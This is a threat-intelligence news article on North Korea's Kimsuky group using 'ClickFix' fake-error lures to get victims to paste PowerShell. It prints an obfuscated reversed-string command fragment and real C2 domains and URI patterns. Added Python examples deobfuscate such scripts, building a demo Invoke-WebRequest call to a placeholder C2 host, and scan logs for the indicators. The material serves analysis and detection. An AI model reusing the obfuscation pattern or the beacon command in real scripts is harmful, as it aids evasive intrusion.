The notorious North Korean threat group Kimsuky has adopted a sophisticated social engineering tactic known as “ClickFix” to deceive users into executing malicious scripts on their own systems.
Originally introduced by Proofpoint researchers in April 2024, this deceptive technique tricks victims into believing they need to troubleshoot browser errors or verify security documents, ultimately leading them to unknowingly participate in their own compromise through manual code execution.
The ClickFix methodology represents a significant evolution in psychological manipulation tactics, disguising malicious commands as legitimate troubleshooting procedures.
Victims encounter fake error messages that appear to originate from trusted sources like Google Chrome, prompting them to copy and paste seemingly innocent code into PowerShell consoles.
This approach effectively bypasses traditional security measures by exploiting human behavior rather than technical vulnerabilities, making detection significantly more challenging for conventional endpoint protection systems.
Genians analysts identified multiple attack campaigns throughout 2025 where Kimsuky operatives successfully deployed ClickFix tactics against high-value targets in South Korea.
The security researchers observed the group targeting diplomacy and national security experts through sophisticated spear-phishing operations, demonstrating the technique’s effectiveness in circumventing endpoint protection systems.
The campaigns have evolved from simple VBS-based attacks to more sophisticated PowerShell implementations, showing continuous adaptation to defensive countermeasures.
Recent investigations revealed that Kimsuky has integrated ClickFix into their ongoing “BabyShark” threat activity, utilizing multilingual instruction manuals in English, French, German, Japanese, Korean, Russian, and Chinese.
The attackers impersonate legitimate entities, including government officials, news correspondents, and security personnel, to establish trust before delivering malicious payloads through encrypted archives or deceptive websites designed to mimic authentic portals and services.
Advanced Obfuscation and Persistence Mechanisms
The technical sophistication of Kimsuky’s ClickFix implementation demonstrates remarkable advancement in evasion techniques designed to circumvent modern security solutions.
The malware employs reverse-order string obfuscation to conceal malicious PowerShell commands, making visual inspection nearly impossible while maintaining full execution capability.
A typical obfuscated command structure appears as:
$value='tixe&"''atad-mrof/trapitlum'' epyTtnetnoC-'   # reversed fragment of the real command, stored as a single-quoted literal ('' escapes an embedded quote)
$req_value=-join $value.ToCharArray()[-1..-$value.Length];   # index from -1 down to -Length to read the characters back in reverse and join them
cmd /c $req_value;exit;   # hand the reconstructed command to cmd.exe
This technique stores malicious functionality in reversed strings, which are then reconstructed at runtime through PowerShell’s character array manipulation functions.
The malware further obscures its operations by inserting random numerical sequences like “7539518426” throughout command structures, utilizing Windows’ native string replacement functionality to remove these markers during execution, effectively creating a dynamic decryption process.
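Both tricks just described, the reversed string reconstructed with ToCharArray()[-1..-Length] and the junk digit markers stripped at runtime with Replace, can be undone statically by an analyst before anything is executed. The following Python is an added example written for this page, not analysis code from Genians or code taken from a sample: the demo script it builds is constructed, only the marker value "7539518426" and the reversal idiom come from the article, and c2.example.invalid is a placeholder host. It also decodes the article's own three-line fragment (with its quoting made valid PowerShell).

```python
"""Static deobfuscation of the ClickFix PowerShell tricks described above.

Added example for this page (not Genians' analysis code, not a real sample).
The demo script is constructed here; only the junk marker "7539518426" and the
reversal idiom come from the article. c2.example.invalid is a placeholder.
"""
import re

MARKER = "7539518426"  # junk digit sequence quoted in the article (assumption: varies per sample)

# $name = '...'  or  $name = "..."   (a single-quoted PowerShell literal escapes ' as '')
ASSIGN_RE = re.compile(r"""\$(\w+)\s*=\s*(?:'((?:[^']|'')*)'|"([^"]*)")""")
# the reversal idiom: $x.ToCharArray()[-1..-$x.Length]
REVERSE_RE = re.compile(
    r"\$(\w+)\s*\.\s*ToCharArray\(\)\s*\[\s*-1\s*\.\.\s*-\s*\$(\w+)\s*\.\s*Length\s*\]", re.I)
# marker removal at runtime: .Replace('7539518426','')  or  -replace '7539518426'
REPLACE_RE = re.compile(r"""(?:\.Replace\(|-replace\s+)\s*['"](\d{6,})['"]""", re.I)


def string_literals(script):
    """Map each assigned variable to its decoded string literal."""
    out = {}
    for name, single, double in ASSIGN_RE.findall(script):
        out[name] = single.replace("''", "'") if single else double
    return out


def reversed_variables(script):
    """Names of variables the script reads back character-by-character in reverse."""
    return {a.lower() for a, b in REVERSE_RE.findall(script) if a.lower() == b.lower()}


def markers_in(script):
    """Digit sequences the script deletes at runtime."""
    return set(REPLACE_RE.findall(script))


def deobfuscate(script, extra_markers=(MARKER,)):
    """Recover the plaintext behind every obfuscated string literal in the script."""
    markers = markers_in(script) | set(extra_markers)
    reversed_vars = reversed_variables(script)
    recovered = {}
    for name, value in string_literals(script).items():
        # a sample may insert markers before or after storing the string backwards,
        # so remove both orientations before undoing the reversal
        for mk in markers:
            value = value.replace(mk, "").replace(mk[::-1], "")
        if name.lower() in reversed_vars:
            value = value[::-1]
        recovered[name] = value
    return recovered


def suspicion_reasons(script):
    """Cheap triage: which of the article's obfuscation hallmarks appear?"""
    reasons = []
    if REVERSE_RE.search(script):
        reasons.append("reversed-string reconstruction")
    if markers_in(script):
        reasons.append("runtime removal of junk digit markers")
    if re.search(r"\bcmd(\.exe)?\s+/c\s+\$\w+", script, re.I):
        reasons.append("variable handed to cmd /c")
    return reasons


# constructed plaintext for the demo; the host is a placeholder
PLAINTEXT = ("Invoke-WebRequest http://c2.example.invalid/demo.php?ccs=cin "
             "-ContentType 'multipart/form-data'")


def build_demo_script(command=PLAINTEXT, marker=MARKER, every=20):
    """Construct a script in the style the article describes (demo input only)."""
    stored = command[::-1]
    stored = marker.join(stored[i:i + every] for i in range(0, len(stored), every))
    literal = "'" + stored.replace("'", "''") + "'"
    return (f"$value={literal}\n"
            f"$req_value=(-join $value.ToCharArray()[-1..-$value.Length]).Replace('{marker}','');\n"
            "cmd /c $req_value;exit;\n")


# the fragment printed in the article, with its quoting made valid PowerShell
ARTICLE_SNIPPET = (
    "$value='tixe&\"''atad-mrof/trapitlum'' epyTtnetnoC-'\n"
    "$req_value=-join $value.ToCharArray()[-1..-$value.Length];\n"
    "cmd /c $req_value;exit;\n")

if __name__ == "__main__":
    for label, script in (("constructed", build_demo_script()), ("article", ARTICLE_SNIPPET)):
        print(label, suspicion_reasons(script), deobfuscate(script))
```

The reversal idiom and the Replace() call are matched structurally rather than by literal string, so whitespace or casing changes in a new sample do not defeat the triage; a real hunt would add the same regexes as a sandbox or EDR rule on script-block logging output rather than on files alone.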
Once successfully deployed, the malware establishes persistence through scheduled task creation and maintains communication with command-and-control servers using distinctive URI patterns including “demo.php?ccs=cin” and “demo.php?ccs=cout”.
The infrastructure spans multiple countries and utilizes dynamic DNS services, with recent campaigns communicating through domains like konamo.xyz and raedom.store.
The consistent version identifier “Version:RE4T-GT7J-KJ90-JB6F-VG5F” observed across campaigns confirms the connection to Kimsuky’s broader BabyShark operation.
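The URI patterns, domains and version identifier above are concrete enough to hunt for in web-proxy logs. The following Python is an added example written for this page, not a detection rule shipped by Genians or any vendor: the log layout and every log line are constructed, and only the two demo.php?ccs= patterns, the two domains and the Version: tag come from the article.

```python
"""Scan proxy-style web logs for the C2 indicators quoted in the article.

Added example for this page, not a vendor detection rule. The log format and
every log line below are constructed; the URI patterns, domains and version
tag come from the article.
"""
import re
from collections import Counter

C2_URI_RE = re.compile(r"/demo\.php\?ccs=(cin|cout)\b", re.I)
C2_DOMAINS = {"konamo.xyz", "raedom.store"}           # from the article, not exhaustive
VERSION_TAG = "Version:RE4T-GT7J-KJ90-JB6F-VG5F"       # BabyShark identifier from the article

# constructed log layout: <timestamp> <client-ip> <method> <url> <status> [body excerpt]
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})"
    r"(?:\s+(?P<body>.*))?$")

# constructed sample lines; the hosts and addresses are illustrative
SAMPLE_LOG = """\
2025-06-02T09:14:03Z 10.0.0.15 GET https://www.example.com/index.html 200
2025-06-02T09:14:10Z 10.0.0.15 POST http://konamo.xyz/demo.php?ccs=cin 200 Version:RE4T-GT7J-KJ90-JB6F-VG5F
2025-06-02T09:14:12Z 10.0.0.15 GET http://konamo.xyz/demo.php?ccs=cout 200
2025-06-02T09:15:40Z 10.0.0.22 GET https://update.example.org/demo.php?ccs=cin 404
2025-06-02T09:16:01Z 10.0.0.31 GET https://cdn.example.net/demo.html 200
"""


def host_of(url):
    """Lower-cased host part of a URL, or '' when there is no scheme."""
    m = re.match(r"^[a-z][a-z0-9+.-]*://([^/:?#]+)", url, re.I)
    return m.group(1).lower() if m else ""


def classify(line):
    """Return the parsed record with a 'hits' list, or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    hits = []
    uri = C2_URI_RE.search(rec["url"])
    if uri:
        hits.append("c2-uri:" + uri.group(1).lower())
    host = host_of(rec["url"])
    if host in C2_DOMAINS or any(host.endswith("." + d) for d in C2_DOMAINS):
        hits.append("c2-domain:" + host)
    if VERSION_TAG in rec["url"] or VERSION_TAG in (rec["body"] or ""):
        hits.append("babyshark-version-tag")
    rec["hits"] = hits
    return rec


def scan(log_text):
    """Alerts for every matching line plus a per-client hit count for triage."""
    alerts = [r for r in map(classify, log_text.splitlines()) if r and r["hits"]]
    return alerts, Counter(r["client"] for r in alerts)


if __name__ == "__main__":
    alerts, per_client = scan(SAMPLE_LOG)
    for a in alerts:
        print(a["ts"], a["client"], a["url"], a["hits"])
    print(dict(per_client))
```

The URI check fires on its own, independent of the domain list, which is the point: the article notes the infrastructure moves across countries and dynamic DNS providers, so a hunt keyed only on the two named domains would age quickly, while the demo.php?ccs=cin/cout beaconing pattern and the version tag are the more durable signal.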
The post Kimsuky Hackers Using ClickFix Technique to Execute Malicious Scripts on Victim Machines appeared first on Cyber Security News.